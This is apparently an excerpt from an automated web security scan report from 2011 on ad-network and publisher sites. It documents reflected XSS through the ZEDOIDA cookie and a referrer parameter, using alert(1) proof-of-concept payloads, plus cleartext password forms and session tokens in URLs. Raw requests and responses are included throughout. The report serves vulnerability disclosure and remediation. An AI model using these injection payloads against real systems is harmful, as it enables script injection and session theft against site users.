document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1620509&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=86400&referrer=http://www.google.com/search%3Fhl=en%26q=e4c31'-alert(1)-'1769fa3b869&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1620509%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3
...[SNIP]...

2.144. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-504/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfb25"-alert(1)-"75ee6a13843 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/c5/jsc/fm.js?c=8&a=0&f=&n=1545&r=13&d=9&q=&$=&s=2&z=0.6579760571476072 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311bfb25"-alert(1)-"75ee6a13843; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; FFgeo=5386156; ZCBC=1; FFMChanCap=2457780B305,825#722607,7038#1013066:767,4#789954|0,1#0,24:0,10#0,24:0,1#0,24; PI=h1201513Za1013066Zc305007038,305007038Zs608Zt1255Zm768Zb43199; FFSkp=305,7040,15,1:; FFcat=305,7040,15:305,7038,15; FFad=0:0; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:3944d'$1545:1c4ea';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,622,9:1545,8,9:826,622,14:1545,8,14:1545,8,0:0,8,14:1545,0,14:0,8,9:1545,0,9:305,7038,15:305,7040,15:305,7038,151a0a560b58e80ec1adb4033a;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=38:36:27:25:3:1:1:1:1:1:8:None;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFMCap=2470020B826,110235,110236:1545,219513,220546,220547,219514,221452,228586,235518,221451|2,1#0,24:2,1#0,24:4,1#0,24:5,1#0,24:5,1#0,24:4,1#0,24:4,1#0,24:0,1#0,24:0,1#0,24:4,1#0,24;expires=Wed, 12 Oct 2011 12:49:06 GMT;path=/;domain=.zedo.com;
ETag: "8710bb37-8952-4aa4e77af70c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=152
Expires: Mon, 12 Sep 2011 12:51:38 GMT
Date: Mon, 12 Sep 2011 12:49:06 GMT
Content-Length: 2740
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='1c4ea'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=1c4ea';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311bfb25"-alert(1)-"75ee6a13843';

var zzhasAd=undefined;


                                                                    var
...[SNIP]...

2.145. http://c7.zedo.com/bar/v16-507/c5/jsc/fm.js [ZEDOIDA cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-507/c5/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3c61c"-alert(1)-"72963d88d75 was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/c5/jsc/fm.js?c=7038/1668/1&a=0&f=&n=305&r=13&d=15&q=&$=&s=608&z=0.9584475292358547 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~0903113c61c"-alert(1)-"72963d88d75; ZCBC=1; ZEDOIDX=13; aps=2; FFgeo=5386156; FFMCap=2457900B1185,234056,234851,234925:933,196008:826,110235,110236|0,1#0,24:0,1#0,24:0,1#0,24:0,10#0,24:0,10#0,24:0,10#0,24; ZFFAbh=977B826,20|121_977#365; ZFFBbh=985B826,20|121_977#0; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24; PI=h963595Za971199Zc305007038,305007038Zs608Zt1255; FFSkp=305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:; FFcat=305,7040,15:305,7038,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,9; FFad=2:2:1:0:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 448
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:f095e';expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,7038,15:305,7040,15:933,56,15:826,622,14:1545,8,14:826,622,9:1545,8,91a0a560b5ee888bf58170a13;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=16:2:1:0:0:0:01a0a560b5991a4ca97d403e3;expires=Tue, 13 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFSkp=305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:305,7038,15,1:305,7040,15,1:1a0a560b8232ac2cc4a13028;expires=Tue, 13 Sep 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "87365ea2-8952-4acbc23d78a80"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=79
Expires: Mon, 12 Sep 2011 13:05:03 GMT
Date: Mon, 12 Sep 2011 13:03:44 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=608;var zzPat='f095e'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=f095e';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~0903113c61c"-alert(1)-"72963d88d75';

var zzhasAd=undefined;


               

3. Cleartext submission of password
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://www.digitaldollhouse.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<div id="login"><form action="/homeone?destination=homeone" accept-charset="UTF-8" method="post" id="newhome-login">
<div>
...[SNIP]...
<div class="form-item" id="newhome-login-pass-wrapper">
<input type="password" name="pass" id="newhome-login-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

3.2. http://www.digitaldollhouse.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
</div>
<form action="/" accept-charset="UTF-8" method="post" id="newhome-register" onsubmit="pageTracker._trackPageview(&#039;/virtual/register&#039;);">
<div>
...[SNIP]...
</label>
<input type="password" name="pass[pass1]" id="edit-pass-pass1" maxlength="128" size="25" class="form-text required password-field" />
</div>
...[SNIP]...
</label>
<input type="password" name="pass[pass2]" id="edit-pass-pass2" maxlength="128" size="25" class="form-text required password-confirm" />
</div>
...[SNIP]...

3.3. http://www.fastcompany.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
</div><form action="/" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-regPass-wrapper">
<input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

3.4. http://www.fastcompany.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<div id="left_forms"><form action="/home?destination=home" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-pass-wrapper">
<input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" />
</div>
...[SNIP]...

3.5. http://www.nowpublic.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nowpublic.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.nowpublic.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:18 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n54.panthercdn.com
ETag: "f79c8d21f3918aedd34f5c0ed9e4fcae"
Cache-Control: max-age=360
Expires: Mon, 12 Sep 2011 12:54:12 GMT
Age: 6
Content-Length: 74898
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Mon, 12 Sep 2011 12:28:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="wrapper-body">
<form method="post" action="http://my.nowpublic.com/user/login">
<div id="login-name-wrapper" class="form-item">
...[SNIP]...
</label>
<input type="password" name="pass" id="login-pass" maxlength="128" size="30" class="form-text" />
</div>
...[SNIP]...

4. Session token in URL
There are 6 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


4.1. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=replace&advid=996&token=FACO1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; C2W4=0; FC1-WCR=132982_2_3CA1G^132981_1_3CA3o; V=PpAVCxNh2PJr; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Thu, 06-Sep-2012 12:47:51 GMT; Path=/
Set-Cookie: cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Tue, 16-Aug-2016 12:47:51 GMT; Path=/
Content-Type: image/gif
Date: Mon, 12 Sep 2011 12:47:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

4.2. http://l.sharethis.com/pview

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=wp.12086c39-fe96-4496-b817-e62244e98b59&hostname=www.dome9.com&location=%2F&url=http%3A%2F%2Fwww.dome9.com%2F&sessionID=1315849264587.66546&fpc=35aae75-1325eba5dcc-1493d30f-1&ts1315849265708.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.dome9.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 12 Sep 2011 12:40:55 GMT
Connection: keep-alive


4.3. http://video.fastcompany.com/manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://video.fastcompany.com
Path:   /manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /manifests/companies/mansueto-digital/videos.rss/8516eaf70522ed9dcc26b0815a85ef0c-fc_playlist_homepage.txt?voxtoken=system&autoplay=false&config=%7BconfigInject%3A'true'%7D&embed_location=http%3A%2F%2Fwww.fastcompany.com%2F&feed=http%3A%2F%2Fvideo.fastcompany.com%2Fcompanies%2Fmansueto-digital%2Fvideos.rss%3Fids%3D35a3467f31b51%2C5a74966232a47%2C1bc51eb069eb1%2C29b58b01bf488%2C79b00a7ba65dd%2C273bd40607339%26append_image_to_description%3Dfalse%26verbosity%3Dlow&height=180&p=fc_playlist_homepage&width=320 HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:07 GMT
Server: VoxCAST
Last-Modified: Sat, 10 Sep 2011 12:55:27 GMT
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Mon, 12 Sep 2011 12:49:20 GMT
X-Cache: HIT from VoxCAST
Content-Length: 4383
Age: 3528
Content-Type: text/plain

/plugins/flowplayer.swf?config=%7B%22plugins%22%3A%7B%22bwcheck%22%3A%7B%22url%22%3A%22flowplayer.bwcheck.swf%22%2C%22serverType%22%3A%22fms%22%2C%22netConnectionUrl%22%3A%22rtmp%3A%2F%2Ffms.0367.edge
...[SNIP]...

4.4. http://video.fastcompany.com/plugins/flowplayer.swf

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://video.fastcompany.com
Path:   /plugins/flowplayer.swf

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /plugins/flowplayer.swf?voxtoken=system&embed_domain=www.fastcompany.com HTTP/1.1
Host: video.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://video.fastcompany.com/plugins/player.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1603584230-1315849705375

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:09 GMT
Server: VoxCAST
Last-Modified: Thu, 25 Aug 2011 01:47:01 GMT
Cache-Control: max-age=3600
Expires: Mon, 12 Sep 2011 13:47:36 GMT
Accept-Ranges: bytes
Content-Length: 123292
Age: 33
X-Cache: HIT from VoxCAST
Content-Type: application/x-shockwave-flash

CWS
...[SNIP]...

4.5. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=127445909615&app_id=127445909615&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd667bad4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36fd7b1e%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f5002a3%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33dd7c2b4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df146f8bdf4%26origin%3Dhttp%253A%252F%252Fwww.popsugar.com%252Ff2363acf9c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df155d9a90c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/community/welcome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.174.125
X-Cnection: close
Date: Mon, 12 Sep 2011 12:47:56 GMT
Content-Length: 245

<script type="text/javascript">
parent.postMessage("cb=f33dd7c2b4&origin=http\u00253A\u00252F\u00252Fwww.popsugar.com\u00252Ff2363acf9c&relation=parent&transport=postmessage&frame=f155d9a90c", "http:\
...[SNIP]...

4.6. http://www.fastcompany.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<!-- ContextWeb Start -->
